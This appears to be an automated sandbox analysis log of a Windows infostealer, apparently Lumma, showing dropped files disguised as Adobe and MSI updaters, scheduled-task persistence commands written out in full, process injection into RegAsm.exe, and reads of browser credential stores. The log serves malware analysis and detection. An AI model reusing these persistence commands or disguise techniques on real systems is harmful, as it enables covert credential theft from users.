                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49770 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49771 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49772 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49773 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49774 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49775 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49776 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49777 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49778 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49779 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49780 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49781 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042DDE0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,7_2_0042DDE0

                  System Summary

                  Source: lumma1504[1].exe.0.dr, RemoteObjects.csLarge array initialization: RemoteObjects: array initializer size 307200
                  Source: oRkIPIEeryat7GMgjkBr.exe.0.dr, RemoteObjects.csLarge array initialization: RemoteObjects: array initializer size 307200
                  Source: AdobeUpdaterV202.exe.0.dr, RemoteObjects.csLarge array initialization: RemoteObjects: array initializer size 307200
                  Source: MSIUpdaterV202.exe.0.dr, RemoteObjects.csLarge array initialization: RemoteObjects: array initializer size 307200
                  Source: 2q45IEa3Ee.exeStatic PE information: section name:
                  Source: 2q45IEa3Ee.exeStatic PE information: section name:
                  Source: 2q45IEa3Ee.exeStatic PE information: section name:
                  Source: 2q45IEa3Ee.exeStatic PE information: section name:
                  Source: Joe Sandbox ViewDropped File: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe F5913E753281DBDF88F36C73D13AFBF4AF62046E25F8E148E87A80E88818C4D7
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe F5913E753281DBDF88F36C73D13AFBF4AF62046E25F8E148E87A80E88818C4D7
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma1504[1].exe F5913E753281DBDF88F36C73D13AFBF4AF62046E25F8E148E87A80E88818C4D7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00408C90 appears 42 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004092E0 appears 160 times
                  Source: 2q45IEa3Ee.exeStatic PE information: invalid certificate
                  Source: 2q45IEa3Ee.exeStatic PE information: Resource name: SETUPSERVICE_WIN7 type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Source: 2q45IEa3Ee.exeStatic PE information: Resource name: SETUPSERVICE_WIN8 type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Source: 2q45IEa3Ee.exeBinary or memory string: OriginalFilename vs 2q45IEa3Ee.exe
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1878839470.0000000006002000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameQuestion.exeJ vs 2q45IEa3Ee.exe
                  Source: 2q45IEa3Ee.exe, 00000000.00000000.1620206673.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSetupAfterRebootService.exeP vs 2q45IEa3Ee.exe
                  Source: 2q45IEa3Ee.exe, 00000000.00000003.1876269087.00000000056E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSetupAfterRebootService.exeP vs 2q45IEa3Ee.exe
                  Source: 2q45IEa3Ee.exe, 00000000.00000003.1876269087.00000000056E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHxInstallerBackground.dll@ vs 2q45IEa3Ee.exe
                  Source: 2q45IEa3Ee.exe, 00000000.00000000.1620206673.0000000000E38000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSetupAfterRebootService.exeP vs 2q45IEa3Ee.exe
                  Source: 2q45IEa3Ee.exe, 00000000.00000000.1620206673.0000000000E38000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHxInstallerBackground.dll@ vs 2q45IEa3Ee.exe
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSetupAfterRebootService.exeP vs 2q45IEa3Ee.exe
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHxInstallerBackground.dll@ vs 2q45IEa3Ee.exe
                  Source: 2q45IEa3Ee.exeBinary or memory string: OriginalFilenameSetupAfterRebootService.exeP vs 2q45IEa3Ee.exe
                  Source: 2q45IEa3Ee.exeBinary or memory string: OriginalFilenameHxInstallerBackground.dll@ vs 2q45IEa3Ee.exe
                  Source: 2q45IEa3Ee.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: lumma1504[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: oRkIPIEeryat7GMgjkBr.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: AdobeUpdaterV202.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: MSIUpdaterV202.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 2q45IEa3Ee.exeStatic PE information: Section: ZLIB complexity 0.9998214068579766
                  Source: 2q45IEa3Ee.exeStatic PE information: Section: ZLIB complexity 0.9965173192771084
                  Source: 2q45IEa3Ee.exeStatic PE information: Section: .reloc ZLIB complexity 1.5
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/30@3/4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042A936 CoCreateInstance,7_2_0042A936
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\signons.sqlite
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6524:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3052:120:WilError_03
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile created: C:\Users\user\AppData\Local\Temp\trixyBzNJzauM1END
                  Source: 2q45IEa3Ee.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: 2q45IEa3Ee.exe, 2q45IEa3Ee.exe, 00000000.00000003.1627633755.0000000001570000.00000004.00001000.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: 2q45IEa3Ee.exe, 00000000.00000003.1627633755.0000000001570000.00000004.00001000.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                  Source: 2q45IEa3Ee.exe, 00000000.00000003.1811612230.0000000005FA8000.00000004.00000020.00020000.00000000.sdmp, hFeN_nRcyMkILogin Data.0.dr, LBC6lg2YJ3HXLogin Data For Account.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: 2q45IEa3Ee.exeVirustotal: Detection: 23%
                  Source: 2q45IEa3Ee.exeReversingLabs: Detection: 28%
                  Source: 2q45IEa3Ee.exeString found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile read: C:\Users\user\Desktop\2q45IEa3Ee.exe
                  Source: unknownProcess created: C:\Users\user\Desktop\2q45IEa3Ee.exe "C:\Users\user\Desktop\2q45IEa3Ee.exe"
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c HR" /sc HOURLY /rl HIGHEST
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c LG" /sc ONLOGON /rl HIGHEST
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeProcess created: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe "C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe"
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: unknownProcess created: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe
                  Source: unknownProcess created: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe "C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe"
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe "C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe"
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: rstrtmgr.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: d3d11.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: dxgi.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: resourcepolicyclient.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: d3d10warp.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: dxcore.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: wininet.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: devobj.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: webio.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: schannel.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: wldp.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: vaultcli.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: profapi.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: netutils.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: propsys.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: edputil.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: appresolver.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: bcp47langs.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: slc.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: userenv.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: sppc.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: apphelp.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeSection loaded: version.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeSection loaded: version.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
